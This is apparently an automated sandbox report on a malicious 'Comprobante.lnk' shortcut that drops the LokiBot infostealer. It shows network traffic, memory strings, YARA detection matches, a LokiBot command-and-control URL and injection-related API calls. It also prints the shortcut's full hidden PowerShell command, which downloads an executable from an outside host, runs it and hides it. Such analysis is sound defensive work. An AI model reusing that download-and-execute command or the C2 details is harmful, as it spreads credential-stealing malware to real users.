                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:40 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:41 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000005.00000002.2638412976.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
                    Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy
                    Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.coF
                    Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: mjtjewi.exe, mjtjewi.exe, 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CEF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sodiumlaurethsulfatedesyroyer.com
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4C502000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4CC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CEEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com
                    Source: powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp, Comprobante.lnk.lnkString found in binary or memory: https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49710 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: mjtjewi.exe.0.drStatic PE information: section name: j1CM!e^U
                    Source: mjtjewi.exe.0.drStatic PE information: section name:
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\mjtjewi.exeJump to dropped file
                    Source: Comprobante.lnk.lnkLNK file: -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DBB0 NtResumeThread,4_2_0AC9DBB0
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DB59 NtResumeThread,4_2_0AC9DB59
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9D9F8 NtReadVirtualMemory,4_2_0AC9D9F8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DF28 NtSetContextThread,4_2_0AC9DF28
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DDD0 NtWriteVirtualMemory,4_2_0AC9DDD0
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DBA8 NtResumeThread,4_2_0AC9DBA8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9D9F0 NtReadVirtualMemory,4_2_0AC9D9F0
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DF21 NtSetContextThread,4_2_0AC9DF21
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9DDC9 NtWriteVirtualMemory,4_2_0AC9DDC9
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01522D204_2_01522D20
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0152B5B84_2_0152B5B8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0152B8584_2_0152B858
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0152D0384_2_0152D038
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015224D84_2_015224D8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015208E14_2_015208E1
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015237604_2_01523760
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01526F284_2_01526F28
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015246C04_2_015246C0
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01526D584_2_01526D58
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01526D484_2_01526D48
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015245F14_2_015245F1
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015231E84_2_015231E8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0152459F4_2_0152459F
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015268704_2_01526870
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015224624_2_01522462
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015268624_2_01526862
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_015218CF4_2_015218CF
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0152A6684_2_0152A668
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01526A904_2_01526A90
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_01526A804_2_01526A80
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF92E04_2_02DF92E0
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF83924_2_02DF8392
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF70884_2_02DF7088
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF55204_2_02DF5520
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF79184_2_02DF7918
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF92B94_2_02DF92B9
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFA2184_2_02DFA218
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFF2184_2_02DFF218
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFA2084_2_02DFA208
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF73584_2_02DF7358
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF03104_2_02DF0310
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF03204_2_02DF0320
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF70534_2_02DF7053
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFB6114_2_02DFB611
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFB6204_2_02DFB620
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF17784_2_02DF1778
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF176A4_2_02DF176A
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFBA884_2_02DFBA88
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFB8B84_2_02DFB8B8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFB8A84_2_02DFB8A8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF19D84_2_02DF19D8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DF19C84_2_02DF19C8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_02DFAFF84_2_02DFAFF8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC90B884_2_0AC90B88
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9E0814_2_0AC9E081
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9262E4_2_0AC9262E
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9CDC04_2_0AC9CDC0
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC90B784_2_0AC90B78
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC900404_2_0AC90040
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC900064_2_0AC90006
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC91FC84_2_0AC91FC8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC91FB84_2_0AC91FB8
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9BC1A4_2_0AC9BC1A
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AC9CD8E4_2_0AC9CD8E
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AF500404_2_0AF50040
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 4_2_0AF500064_2_0AF50006
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_0040549C6_2_0040549C
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_004029D46_2_004029D4
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: String function: 0041219C appears 45 times
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: String function: 00405B6F appears 42 times
                    Source: mjtjewi.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 4.2.mjtjewi.exe.4a289b8.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
